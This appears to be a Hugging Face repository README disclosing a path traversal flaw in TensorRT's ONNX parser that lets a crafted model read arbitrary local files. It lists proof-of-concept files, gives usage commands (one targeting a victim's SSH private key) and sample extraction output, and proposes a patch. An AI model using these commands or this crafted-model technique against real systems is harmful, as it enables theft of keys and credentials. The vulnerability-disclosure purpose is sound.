Downloads · 30 days
0
treforbenbow/tensorrt-path-traversal-file-read
tensorrt-path-traversal-file-read is a machine learning model from treforbenbow. Use it for the machine learning task on the model card, and read the license before you ship it in a product.
TensorRT's ONNX parser (libnvonnxparser) allows absolute file paths in the externaldata.location field of ONNX TensorProto initializers. When a victim loads a malicious ONNX model, arbitrary files from their filesyste…
Downloads · 30 days
0
Access
Public
Updated Mar 31, 2026
Repo size
351 B
Likes
0
Public
Click a slice to open those files.
.py5.7 KB · 51%
From the Hugging Face model README
TensorRT's ONNX parser (libnvonnxparser) allows absolute file paths in the external_data.location field of ONNX TensorProto initializers. When a victim loads a malicious ONNX model, arbitrary files from their filesystem are read as model weights and embedded into the compiled TensorRT engine.
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Critical (CVSS 3.1: 9.1)
normalizePath() in weightUtils.cpp blocks ../ relative directory traversal but does NOT reject absolute paths like C:/Windows/win.ini or /etc/passwd. The absolute path passes through all validation and is used directly in CreateFileMapping() / mmap().
An attacker can craft a ~200-byte ONNX model that, when loaded by TensorRT:
Attack scenarios: steal SSH keys, cloud credentials, application configs, proprietary models.
| File | Description |
|---|---|
poc_windows.onnx | PoC model targeting C:/Windows/win.ini (Windows) |
poc_linux.onnx | PoC model targeting /etc/hostname (Linux) |
reproduce.py | Reproduction script ? loads PoC model and extracts stolen file contents |
create_malicious_model.py | Tool to create custom malicious models targeting any file |
# 1. Install requirements
pip install tensorrt numpy onnx
# 2. Run the PoC (Windows)
python reproduce.py poc_windows.onnx
# 3. Or create a custom exploit model
python create_malicious_model.py C:/Users/victim/.ssh/id_rsa exploit.onnx 4096
python reproduce.py exploit.onnx
[*] Loading model: poc_windows.onnx
[+] Parse succeeded - external file was read as model weights!
[+] Engine built - file contents now embedded in TensorRT engine
[+] Extracted 92 bytes from target file:
----------------------------------------
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
----------------------------------------
| Target File | Result |
|---|---|
C:/Windows/System32/kernel32.dll | Read successful (4096 bytes) |
C:/Windows/System32/ntdll.dll | Read successful (4096 bytes) |
C:/Windows/win.ini | Read successful ? byte-for-byte content match verified |
In parseExternalWeights(), reject absolute paths:
std::string normalizedFile = normalizePath(file);
if (normalizedFile.find("../") != std::string::npos) return false;
// ADD: reject absolute paths
if (!normalizedFile.empty() && (normalizedFile[0] == '/' || normalizedFile[0] == '\\'))
return false;
if (normalizedFile.size() > 1 && normalizedFile[1] == ':')
return false;
TensorRT's C++ parser has its own independent implementation that does not inherit fixes from the ONNX Python library.